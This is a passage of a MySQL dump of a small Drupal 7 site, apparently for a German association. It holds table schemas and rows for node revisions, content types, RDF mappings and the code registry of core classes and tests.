COMMENT 'The Unix timestamp of the last comment that was posted within this node, from comment.changed.', `last_comment_name` varchar(60) DEFAULT NULL COMMENT 'The name of the latest author to post a comment on this node, from comment.name.', `last_comment_uid` int(11) NOT NULL DEFAULT '0' COMMENT 'The user ID of the latest author to post a comment on this node, from comment.uid.', `comment_count` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The total number of comments on this node.', PRIMARY KEY (`nid`), KEY `node_comment_timestamp` (`last_comment_timestamp`), KEY `comment_count` (`comment_count`), KEY `last_comment_uid` (`last_comment_uid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Maintains statistics of node and comments posts to show ...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `node_comment_statistics` -- LOCK TABLES `node_comment_statistics` WRITE; /*!40000 ALTER TABLE `node_comment_statistics` DISABLE KEYS */; INSERT INTO `node_comment_statistics` VALUES (3,0,1426851692,NULL,1,0),(4,0,1426851954,NULL,1,0),(5,0,1426852435,NULL,1,0),(6,0,1428671410,NULL,1,0),(7,0,1429594218,NULL,1,0); /*!40000 ALTER TABLE `node_comment_statistics` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `node_counter` -- DROP TABLE IF EXISTS `node_counter`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `node_counter` ( `nid` int(11) NOT NULL DEFAULT '0' COMMENT 'The node.nid for these statistics.', `totalcount` bigint(20) unsigned NOT NULL DEFAULT '0' COMMENT 'The total number of times the node has been viewed.', `daycount` mediumint(8) unsigned NOT NULL DEFAULT '0' COMMENT 'The total number of times the node has been viewed today.', `timestamp` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The most recent time the node has been viewed.', PRIMARY KEY (`nid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Access statistics for nodes.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `node_counter` -- LOCK TABLES `node_counter` WRITE; /*!40000 ALTER TABLE `node_counter` DISABLE KEYS */; /*!40000 ALTER TABLE `node_counter` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `node_revision` -- DROP TABLE IF EXISTS `node_revision`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `node_revision` ( `nid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The node this version belongs to.', `vid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The primary identifier for this version.', `uid` int(11) NOT NULL DEFAULT '0' COMMENT 'The users.uid that created this version.', `title` varchar(255) NOT NULL DEFAULT '' COMMENT 'The title of this version.', `log` longtext NOT NULL COMMENT 'The log entry explaining the changes in this version.', `timestamp` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when this version was created.', `status` int(11) NOT NULL DEFAULT '1' COMMENT 'Boolean indicating whether the node (at the time of this revision) is published (visible to non-administrators).', `comment` int(11) NOT NULL DEFAULT '0' COMMENT 'Whether comments are allowed on this node (at the time of this revision): 0 = no, 1 = closed (read only), 2 = open (read/write).', `promote` int(11) NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether the node (at the time of this revision) should be displayed on the front page.', `sticky` int(11) NOT NULL DEFAULT '0' COMMENT 'Boolean indicating whether the node (at the time of this revision) should be displayed at the top of lists in which it appears.', PRIMARY KEY (`vid`), KEY `nid` (`nid`), KEY `uid` (`uid`) ) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8 COMMENT='Stores information about each saved version of a node.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `node_revision` -- LOCK TABLES `node_revision` WRITE; /*!40000 ALTER TABLE `node_revision` DISABLE KEYS */; INSERT INTO `node_revision` VALUES (3,3,1,'Allgemeines','',1429126003,1,2,1,0),(4,4,1,'Termine','',1446488130,1,2,0,0),(5,5,1,'Mitgliedschaften','',1426852435,1,2,0,0),(6,6,1,'Anträge','',1436793771,1,2,0,0),(7,7,1,'Freifunk','',1442999232,1,2,0,0); /*!40000 ALTER TABLE `node_revision` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `node_type` -- DROP TABLE IF EXISTS `node_type`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `node_type` ( `type` varchar(32) NOT NULL COMMENT 'The machine-readable name of this type.', `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'The human-readable name of this type.', `base` varchar(255) NOT NULL COMMENT 'The base string used to construct callbacks corresponding to this node type.', `module` varchar(255) NOT NULL COMMENT 'The module defining this node type.', `description` mediumtext NOT NULL COMMENT 'A brief description of this type.', `help` mediumtext NOT NULL COMMENT 'Help information shown to the user when creating a node of this type.', `has_title` tinyint(3) unsigned NOT NULL COMMENT 'Boolean indicating whether this type uses the node.title field.', `title_label` varchar(255) NOT NULL DEFAULT '' COMMENT 'The label displayed for the title field on the edit form.', `custom` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this type is defined by a module (FALSE) or by a user via Add content type (TRUE).', `modified` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this type has been modified by an administrator; currently not used in any way.', `locked` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether the administrator can change the machine name of this type.', `disabled` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether the node type is disabled.', `orig_type` varchar(255) NOT NULL DEFAULT '' COMMENT 'The original machine-readable name of this node type. This may be different from the current type name if the locked field is 0.', PRIMARY KEY (`type`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores information about all defined node types.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `node_type` -- LOCK TABLES `node_type` WRITE; /*!40000 ALTER TABLE `node_type` DISABLE KEYS */; INSERT INTO `node_type` VALUES ('article','Article','node_content','node','Use articles for time-sensitive content like news, press releases or blog posts.','',1,'Title',1,1,0,0,'article'),('blog','Blog entry','blog','blog','Use for multi-user blogs. Every user gets a personal blog.','',1,'Title',0,0,1,0,'blog'),('page','Basic page','node_content','node','Use basic pages for your static content, such as an \'About us\' page.','',1,'Title',1,1,0,0,'page'); /*!40000 ALTER TABLE `node_type` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `queue` -- DROP TABLE IF EXISTS `queue`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `queue` ( `item_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key: Unique item ID.', `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'The queue name.', `data` longblob COMMENT 'The arbitrary data for the item.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'Timestamp when the claim lease expires on the item.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'Timestamp when the item was created.', PRIMARY KEY (`item_id`), KEY `name_created` (`name`,`created`), KEY `expire` (`expire`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COMMENT='Stores items in queues.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `queue` -- LOCK TABLES `queue` WRITE; /*!40000 ALTER TABLE `queue` DISABLE KEYS */; /*!40000 ALTER TABLE `queue` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `rdf_mapping` -- DROP TABLE IF EXISTS `rdf_mapping`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `rdf_mapping` ( `type` varchar(128) NOT NULL COMMENT 'The name of the entity type a mapping applies to (node, user, comment, etc.).', `bundle` varchar(128) NOT NULL COMMENT 'The name of the bundle a mapping applies to.', `mapping` longblob COMMENT 'The serialized mapping of the bundle type and fields to RDF terms.', PRIMARY KEY (`type`,`bundle`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores custom RDF mappings for user defined content types...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `rdf_mapping` -- LOCK TABLES `rdf_mapping` WRITE; /*!40000 ALTER TABLE `rdf_mapping` DISABLE KEYS */; INSERT INTO `rdf_mapping` VALUES ('node','article','a:11:{s:11:\"field_image\";a:2:{s:10:\"predicates\";a:2:{i:0;s:8:\"og:image\";i:1;s:12:\"rdfs:seeAlso\";}s:4:\"type\";s:3:\"rel\";}s:10:\"field_tags\";a:2:{s:10:\"predicates\";a:1:{i:0;s:10:\"dc:subject\";}s:4:\"type\";s:3:\"rel\";}s:7:\"rdftype\";a:2:{i:0;s:9:\"sioc:Item\";i:1;s:13:\"foaf:Document\";}s:5:\"title\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:7:\"created\";a:3:{s:10:\"predicates\";a:2:{i:0;s:7:\"dc:date\";i:1;s:10:\"dc:created\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:7:\"changed\";a:3:{s:10:\"predicates\";a:1:{i:0;s:11:\"dc:modified\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:4:\"body\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"content:encoded\";}}s:3:\"uid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:has_creator\";}s:4:\"type\";s:3:\"rel\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}s:13:\"comment_count\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:num_replies\";}s:8:\"datatype\";s:11:\"xsd:integer\";}s:13:\"last_activity\";a:3:{s:10:\"predicates\";a:1:{i:0;s:23:\"sioc:last_activity_date\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}}'),('node','blog','a:9:{s:7:\"rdftype\";a:2:{i:0;s:9:\"sioc:Post\";i:1;s:14:\"sioct:BlogPost\";}s:5:\"title\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:7:\"created\";a:3:{s:10:\"predicates\";a:2:{i:0;s:7:\"dc:date\";i:1;s:10:\"dc:created\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:7:\"changed\";a:3:{s:10:\"predicates\";a:1:{i:0;s:11:\"dc:modified\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:4:\"body\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"content:encoded\";}}s:3:\"uid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:has_creator\";}s:4:\"type\";s:3:\"rel\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}s:13:\"comment_count\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:num_replies\";}s:8:\"datatype\";s:11:\"xsd:integer\";}s:13:\"last_activity\";a:3:{s:10:\"predicates\";a:1:{i:0;s:23:\"sioc:last_activity_date\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}}'),('node','page','a:9:{s:7:\"rdftype\";a:1:{i:0;s:13:\"foaf:Document\";}s:5:\"title\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:7:\"created\";a:3:{s:10:\"predicates\";a:2:{i:0;s:7:\"dc:date\";i:1;s:10:\"dc:created\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:7:\"changed\";a:3:{s:10:\"predicates\";a:1:{i:0;s:11:\"dc:modified\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:4:\"body\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"content:encoded\";}}s:3:\"uid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:has_creator\";}s:4:\"type\";s:3:\"rel\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}s:13:\"comment_count\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:num_replies\";}s:8:\"datatype\";s:11:\"xsd:integer\";}s:13:\"last_activity\";a:3:{s:10:\"predicates\";a:1:{i:0;s:23:\"sioc:last_activity_date\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}}'); /*!40000 ALTER TABLE `rdf_mapping` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `registry` -- DROP TABLE IF EXISTS `registry`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `registry` ( `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'The name of the function, class, or interface.', `type` varchar(9) NOT NULL DEFAULT '' COMMENT 'Either function or class or interface.', `filename` varchar(255) NOT NULL COMMENT 'Name of the file.', `module` varchar(255) NOT NULL DEFAULT '' COMMENT 'Name of the module the file belongs to.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'The order in which this module’s hooks should be invoked relative to other modules. Equal-weighted modules are ordered by name.', PRIMARY KEY (`name`,`type`), KEY `hook` (`type`,`weight`,`module`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Each record is a function, class, or interface name and...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `registry` -- LOCK TABLES `registry` WRITE; /*!40000 ALTER TABLE `registry` DISABLE KEYS */; INSERT INTO `registry` VALUES ('AccessDeniedTestCase','class','modules/system/system.test','system',0),('AdminMetaTagTestCase','class','modules/system/system.test','system',0),('ArchiverInterface','interface','includes/archiver.inc','',0),('ArchiverTar','class','modules/system/system.archiver.inc','system',0),('ArchiverZip','class','modules/system/system.archiver.inc','system',0),('Archive_Tar','class','modules/system/system.tar.inc','system',0),('BatchMemoryQueue','class','includes/batch.queue.inc','',0),('BatchQueue','class','includes/batch.queue.inc','',0),('BlockAdminThemeTestCase','class','modules/block/block.test','block',-5),('BlockCacheTestCase','class','modules/block/block.test','block',-5),('BlockHashTestCase','class','modules/block/block.test','block',-5),('BlockHiddenRegionTestCase','class','modules/block/block.test','block',-5),('BlockHTMLIdTestCase','class','modules/block/block.test','block',-5),('BlockInvalidRegionTestCase','class','modules/block/block.test','block',-5),('BlockTemplateSuggestionsUnitTest','class','modules/block/block.test','block',-5),('BlockTestCase','class','modules/block/block.test','block',-5),('BlockViewModuleDeltaAlterWebTest','class','modules/block/block.test','block',-5),('BlogTestCase','class','modules/blog/blog.test','blog',0),('ColorTestCase','class','modules/color/color.test','color',0),('CommentActionsTestCase','class','modules/comment/comment.test','comment',0),('CommentAnonymous','class','modules/comment/comment.test','comment',0),('CommentApprovalTest','class','modules/comment/comment.test','comment',0),('CommentBlockFunctionalTest','class','modules/comment/comment.test','comment',0),('CommentContentRebuild','class','modules/comment/comment.test','comment',0),('CommentController','class','modules/comment/comment.module','comment',0),('CommentFieldsTest','class','modules/comment/comment.test','comment',0),('CommentHelperCase','class','modules/comment/comment.test','comment',0),('CommentInterfaceTest','class','modules/comment/comment.test','comment',0),('CommentNodeAccessTest','class','modules/comment/comment.test','comment',0),('CommentNodeChangesTestCase','class','modules/comment/comment.test','comment',0),('CommentPagerTest','class','modules/comment/comment.test','comment',0),('CommentPreviewTest','class','modules/comment/comment.test','comment',0),('CommentRSSUnitTest','class','modules/comment/comment.test','comment',0),('CommentThreadingTestCase','class','modules/comment/comment.test','comment',0),('CommentTokenReplaceTestCase','class','modules/comment/comment.test','comment',0),('ConfirmFormTest','class','modules/system/system.test','system',0),('ContactPersonalTestCase','class','modules/contact/contact.test','contact',0),('ContactSitewideTestCase','class','modules/contact/contact.test','contact',0),('ContextualDynamicContextTestCase','class','modules/contextual/contextual.test','contextual',0),('CronQueueTestCase','class','modules/system/system.test','system',0),('CronRunTestCase','class','modules/system/system.test','system',0),('DashboardBlocksTestCase','class','modules/dashboard/dashboard.test','dashboard',0),('Database','class','includes/database/database.inc','',0),('DatabaseCondition','class','includes/database/query.inc','',0),('DatabaseConnection','class','includes/database/database.inc','',0),('DatabaseConnectionNotDefinedException','class','includes/database/database.inc','',0),('DatabaseConnection_mysql','class','includes/database/mysql/database.inc','',0),('DatabaseConnection_pgsql','class','includes/database/pgsql/database.inc','',0),('DatabaseConnection_sqlite','class','includes/database/sqlite/database.inc','',0),('DatabaseDriverNotSpecifiedException','class','includes/database/database.inc','',0),('DatabaseLog','class','includes/database/log.inc','',0),('DatabaseSchema','class','includes/database/schema.inc','',0),('DatabaseSchemaObjectDoesNotExistException','class','includes/database/schema.inc','',0),('DatabaseSchemaObjectExistsException','class','includes/database/schema.inc','',0),('DatabaseSchema_mysql','class','includes/database/mysql/schema.inc','',0),('DatabaseSchema_pgsql','class','includes/database/pgsql/schema.inc','',0),('DatabaseSchema_sqlite','class','includes/database/sqlite/schema.inc','',0),('DatabaseStatementBase','class','includes/database/database.inc','',0),('DatabaseStatementEmpty','class','includes/database/database.inc','',0),('DatabaseStatementInterface','interface','includes/database/database.inc','',0),('DatabaseStatementPrefetch','class','includes/database/prefetch.inc','',0),('DatabaseStatement_sqlite','class','includes/database/sqlite/database.inc','',0),('DatabaseTaskException','class','includes/install.inc','',0),('DatabaseTasks','class','includes/install.inc','',0),('DatabaseTasks_mysql','class','includes/database/mysql/install.inc','',0),('DatabaseTasks_pgsql','class','includes/database/pgsql/install.inc','',0),('DatabaseTasks_sqlite','class','includes/database/sqlite/install.inc','',0),('DatabaseTransaction','class','includes/database/database.inc','',0),('DatabaseTransactionCommitFailedException','class','includes/database/database.inc','',0),('DatabaseTransactionExplicitCommitNotAllowedException','class','includes/database/database.inc','',0),('DatabaseTransactionNameNonUniqueException','class','includes/database/database.inc','',0),('DatabaseTransactionNoActiveException','class','includes/database/database.inc','',0),('DatabaseTransactionOutOfOrderException','class','includes/database/database.inc','',0),('DateTimeFunctionalTest','class','modules/system/system.test','system',0),('DBLogTestCase','class','modules/dblog/dblog.test','dblog',0),('DefaultMailSystem','class','modules/system/system.mail.inc','system',0),('DeleteQuery','class','includes/database/query.inc','',0),('DeleteQuery_sqlite','class','includes/database/sqlite/query.inc','',0),('DrupalCacheArray','class','includes/bootstrap.inc','',0),('DrupalCacheInterface','interface','includes/cache.inc','',0),('DrupalDatabaseCache','class','includes/cache.inc','',0),('DrupalDefaultEntityController','class','includes/entity.inc','',0),('DrupalEntityControllerInterface','interface','includes/entity.inc','',0),('DrupalFakeCache','class','includes/cache-install.inc','',0),('DrupalLocalStreamWrapper','class','includes/stream_wrappers.inc','',0),('DrupalPrivateStreamWrapper','class','includes/stream_wrappers.inc','',0),('DrupalPublicStreamWrapper','class','includes/stream_wrappers.inc','',0),('DrupalQueue','class','modules/system/system.queue.inc','system',0),('DrupalQueueInterface','interface','modules/system/system.queue.inc','system',0),('DrupalReliableQueueInterface','interface','modules/system/system.queue.inc','system',0),('DrupalSetMessageTest','class','modules/system/system.test','system',0),('DrupalStreamWrapperInterface','interface','includes/stream_wrappers.inc','',0),('DrupalTemporaryStreamWrapper','class','includes/stream_wrappers.inc','',0),('DrupalUpdateException','class','includes/update.inc','',0),('DrupalUpdaterInterface','interface','includes/updater.inc','',0),('EnableDisableTestCase','class','modules/system/system.test','system',0),('EntityFieldQuery','class','includes/entity.inc','',0),('EntityFieldQueryException','class','includes/entity.inc','',0),('EntityMalformedException','class','includes/entity.inc','',0),('EntityPropertiesTestCase','class','modules/field/tests/field.test','field',0),('FieldAttachOtherTestCase','class','modules/field/tests/field.test','field',0),('FieldAttachStorageTestCase','class','modules/field/tests/field.test','field',0),('FieldAttachTestCase','class','modules/field/tests/field.test','field',0),('FieldBulkDeleteTestCase','class','modules/field/tests/field.test','field',0),('FieldCrudTestCase','class','modules/field/tests/field.test','field',0),('FieldDisplayAPITestCase','class','modules/field/tests/field.test','field',0),('FieldException','class','modules/field/field.module','field',0),('FieldFormTestCase','class','modules/field/tests/field.test','field',0),('FieldInfo','class','modules/field/field.info.class.inc','field',0),('FieldInfoTestCase','class','modules/field/tests/field.test','field',0),('FieldInstanceCrudTestCase','class','modules/field/tests/field.test','field',0),('FieldsOverlapException','class','includes/database/database.inc','',0),('FieldSqlStorageTestCase','class','modules/field/modules/field_sql_storage/field_sql_storage.test','field_sql_storage',0),('FieldTestCase','class','modules/field/tests/field.test','field',0),('FieldTranslationsTestCase','class','modules/field/tests/field.test','field',0),('FieldUIAlterTestCase','class','modules/field_ui/field_ui.test','field_ui',0),('FieldUIManageDisplayTestCase','class','modules/field_ui/field_ui.test','field_ui',0),('FieldUIManageFieldsTestCase','class','modules/field_ui/field_ui.test','field_ui',0),('FieldUITestCase','class','modules/field_ui/field_ui.test','field_ui',0),('FieldUpdateForbiddenException','class','modules/field/field.module','field',0),('FieldValidationException','class','modules/field/field.attach.inc','field',0),('FileFieldDisplayTestCase','class','modules/file/tests/file.test','file',0),('FileFieldPathTestCase','class','modules/file/tests/file.test','file',0),('FileFieldRevisionTestCase','class','modules/file/tests/file.test','file',0),('FileFieldTestCase','class','modules/file/tests/file.test','file',0),('FileFieldValidateTestCase','class','modules/file/tests/file.test','file',0),('FileFieldWidgetTestCase','class','modules/file/tests/file.test','file',0),('FileManagedFileElementTestCase','class','modules/file/tests/file.test','file',0),('FilePrivateTestCase','class','modules/file/tests/file.test','file',0),('FileTaxonomyTermTestCase','class','modules/file/tests/file.test','file',0),('FileTokenReplaceTestCase','class','modules/file/tests/file.test','file',0),('FileTransfer','class','includes/filetransfer/filetransfer.inc','',0),('FileTransferChmodInterface','interface','includes/filetransfer/filetransfer.inc','',0),('FileTransferException','class','includes/filetransfer/filetransfer.inc','',0),('FileTransferFTP','class','includes/filetransfer/ftp.inc','',0),('FileTransferFTPExtension','class','includes/filetransfer/ftp.inc','',0),('FileTransferLocal','class','includes/filetransfer/local.inc','',0),('FileTransferSSH','class','includes/filetransfer/ssh.inc','',0),('FilterAdminTestCase','class','modules/filter/filter.test','filter',0),('FilterCRUDTestCase','class','modules/filter/filter.test','filter',0),('FilterDefaultFormatTestCase','class','modules/filter/filter.test','filter',0),('FilterDOMSerializeTestCase','class','modules/filter/filter.test','filter',0),('FilterFormatAccessTestCase','class','modules/filter/filter.test','filter',0),('FilterHooksTestCase','class','modules/filter/filter.test','filter',0),('FilterNoFormatTestCase','class','modules/filter/filter.test','filter',0),('FilterSecurityTestCase','class','modules/filter/filter.test','filter',0),('FilterSettingsTestCase','class','modules/filter/filter.test','filter',0),('FilterUnitTestCase','class','modules/filter/filter.test','filter',0),('FloodFunctionalTest','class','modules/system/system.test','system',0),('FrontPageTestCase','class','modules/system/system.test','system',0),('HelpTestCase','class','modules/help/help.test','help',0),('HookRequirementsTestCase','class','modules/system/system.test','system',0),('ImageAdminStylesUnitTest','class','modules/image/image.test','image',0),('ImageAdminUiTestCase','class','modules/image/image.test','image',0),('ImageDimensionsScaleTestCase','class','modules/image/image.test','image',0),('ImageDimensionsTestCase','class','modules/image/image.test','image',0),('ImageEffectsUnitTest','class','modules/image/image.test','image',0),('ImageFieldDefaultImagesTestCase','class','modules/image/image.test','image',0),('ImageFieldDisplayTestCase','class','modules/image/image.test','image',0),('ImageFieldTestCase','class','modules/image/image.test','image',0),('ImageFieldValidateTestCase','class','modules/image/image.test','image',0),('ImageStyleFlushTest','class','modules/image/image.test','image',0),('ImageStylesPathAndUrlTestCase','class','modules/image/image.test','image',0),('ImageThemeFunctionWebTestCase','class','modules/image/image.test','image',0),('InfoFileParserTestCase','class','modules/system/system.test','system',0),('InsertQuery','class','includes/database/query.inc','',0),('InsertQuery_mysql','class','includes/database/mysql/query.inc','',0),('InsertQuery_pgsql','class','includes/database/pgsql/query.inc','',0),('InsertQuery_sqlite','class','includes/database/sqlite/query.inc','',0),('InvalidMergeQueryException','class','includes/database/database.inc','',0),('IPAddressBlockingTestCase','class','modules/system/system.test','system',0),('ListDynamicValuesTestCase','class','modules/field/modules/list/tests/list.test','list',0),('ListDynamicValuesValidationTestCase','class','modules/field/modules/list/tests/list.test','list',0),('ListFieldTestCase','class','modules/field/modules/list/tests/list.test','list',0),('ListFieldUITestCase','class','modules/field/modules/list/tests/list.test','list',0),('MailSystemInterface','interface','includes/mail.inc','',0),('MemoryQueue','class','modules/system/system.queue.inc','system',0),('MenuNodeTestCase','class','modules/menu/menu.test','menu',0),('MenuTestCase','class','modules/menu/menu.test','menu',0),('MergeQuery','class','includes/database/query.inc','',0),('ModuleDependencyTestCase','class','modules/system/system.test','system',0),('ModuleRequiredTestCase','class','modules/system/system.test','system',0),('ModuleTestCase','class','modules/system/system.test','system',0),('ModuleUpdater','class','modules/system/system.updater.inc','system',0),('ModuleVersionTestCase','class','modules/system/system.test','system',0),('MultiStepNodeFormBasicOptionsTest','class','modules/node/node.test','node',0),('NewDefaultThemeBlocks','class','modules/block/block.test','block',-5),('NodeAccessBaseTableTestCase','class','modules/node/node.test','node',0),('NodeAccessFieldTestCase','class','modules/node/node.test','node',0),('NodeAccessPagerTestCase','class','modules/node/node.test','node',0),('NodeAccessRebuildTestCase','class','modules/node/node.test','node',0),('NodeAccessRecordsTestCase','class','modules/node/node.test','node',0),('NodeAccessTestCase','class','modules/node/node.test','node',0),('NodeAdminTestCase','class','modules/node/node.test','node',0),('NodeBlockFunctionalTest','class','modules/node/node.test','node',0),('NodeBlockTestCase','class','modules/node/node.test','node',0),('NodeBuildContent','class','modules/node/node.test','node',0),('NodeController','class','modules/node/node.module','node',0),('NodeCreationTestCase','class','modules/node/node.test','node',0),('NodeEntityFieldQueryAlter','class','modules/node/node.test','node',0),('NodeEntityViewModeAlterTest','class','modules/node/node.test','node',0),('NodeFeedTestCase','class','modules/node/node.test','node',0),('NodeLoadHooksTestCase','class','modules/node/node.test','node',0),('NodeLoadMultipleTestCase','class','modules/node/node.test','node',0),('NodePageCacheTest','class','modules/node/node.test','node',0),('NodePostSettingsTestCase','class','modules/node/node.test','node',0),('NodeQueryAlter','class','modules/node/node.test','node',0),('NodeRevisionPermissionsTestCase','class','modules/node/node.test','node',0),('NodeRevisionsTestCase','class','modules/node/node.test','node',0),('NodeRSSContentTestCase','class','modules/node/node.test','node',0),('NodeSaveTestCase','class','modules/node/node.test','node',0),('NodeTitleTestCase','class','modules/node/node.test','node',0),('NodeTitleXSSTestCase','class','modules/node/node.test','node',0),('NodeTokenReplaceTestCase','class','modules/node/node.test','node',0),('NodeTypePersistenceTestCase','class','modules/node/node.test','node',0),('NodeTypeTestCase','class','modules/node/node.test','node',0),('NodeWebTestCase','class','modules/node/node.test','node',0),('NoFieldsException','class','includes/database/database.inc','',0),('NoHelpTestCase','class','modules/help/help.test','help',0),('NonDefaultBlockAdmin','class','modules/block/block.test','block',-5),('NumberFieldTestCase','class','modules/field/modules/number/number.test','number',0),('OptionsSelectDynamicValuesTestCase','class','modules/field/modules/options/options.test','options',0),('OptionsWidgetsTestCase','class','modules/field/modules/options/options.test','options',0),('PageEditTestCase','class','modules/node/node.test','node',0),('PageNotFoundTestCase','class','modules/system/system.test','system',0),('PagePreviewTestCase','class','modules/node/node.test','node',0),('PagerDefault','class','includes/pager.inc','',0),('PageTitleFiltering','class','modules/system/system.test','system',0),('PageViewTestCase','class','modules/node/node.test','node',0),('PathLanguageTestCase','class','modules/path/path.test','path',0),('PathLanguageUITestCase','class','modules/path/path.test','path',0),('PathMonolingualTestCase','class','modules/path/path.test','path',0),('PathTaxonomyTermTestCase','class','modules/path/path.test','path',0),('PathTestCase','class','modules/path/path.test','path',0),('PHPAccessTestCase','class','modules/php/php.test','php',0),('PHPFilterTestCase','class','modules/php/php.test','php',0),('PHPTestCase','class','modules/php/php.test','php',0),('Query','class','includes/database/query.inc','',0),('QueryAlterableInterface','interface','includes/database/query.inc','',0),('QueryConditionInterface','interface','includes/database/query.inc','',0),('QueryExtendableInterface','interface','includes/database/select.inc','',0),('QueryPlaceholderInterface','interface','includes/database/query.inc','',0),('QueueTestCase','class','modules/system/system.test','system',0),('RdfCommentAttributesTestCase','class','modules/rdf/rdf.test','rdf',0),('RdfCrudTestCase','class','modules/rdf/rdf.test','rdf',0),('RdfGetRdfNamespacesTestCase','class','modules/rdf/rdf.test','rdf',0),('RdfMappingDefinitionTestCase','class','modules/rdf/rdf.test','rdf',0),('RdfMappingHookTestCase','class','modules/rdf/rdf.test','rdf',0),('RdfRdfaMarkupTestCase','class','modules/rdf/rdf.test','rdf',0),('RdfTrackerAttributesTestCase','class','modules/rdf/rdf.test','rdf',0),('RetrieveFileTestCase','class','modules/system/system.test','system',0),('SchemaCache','class','includes/bootstrap.inc','',0),('SearchAdvancedSearchForm','class','modules/search/search.test','search',0),('SearchBlockTestCase','class','modules/search/search.test','search',0),('SearchCommentCountToggleTestCase','class','modules/search/search.test','search',0),('SearchCommentTestCase','class','modules/search/search.test','search',0),('SearchConfigSettingsForm','class','modules/search/search.test','search',0),('SearchEmbedForm','class','modules/search/search.test','search',0),('SearchExactTestCase','class','modules/search/search.test','search',0),('SearchExcerptTestCase','class','modules/search/search.test','search',0),('SearchExpressionInsertExtractTestCase','class','modules/search/search.test','search',0),('SearchKeywordsConditions','class','modules/search/search.test','search',0),('SearchLanguageTestCase','class','modules/search/search.test','search',0),('SearchMatchTestCase','class','modules/search/search.test','search',0),('SearchNodeAccessTest','class','modules/search/search.test','search',0),('SearchNodeTagTest','class','modules/search/search.test','search',0),('SearchNumberMatchingTestCase','class','modules/search/search.test','search',0),('S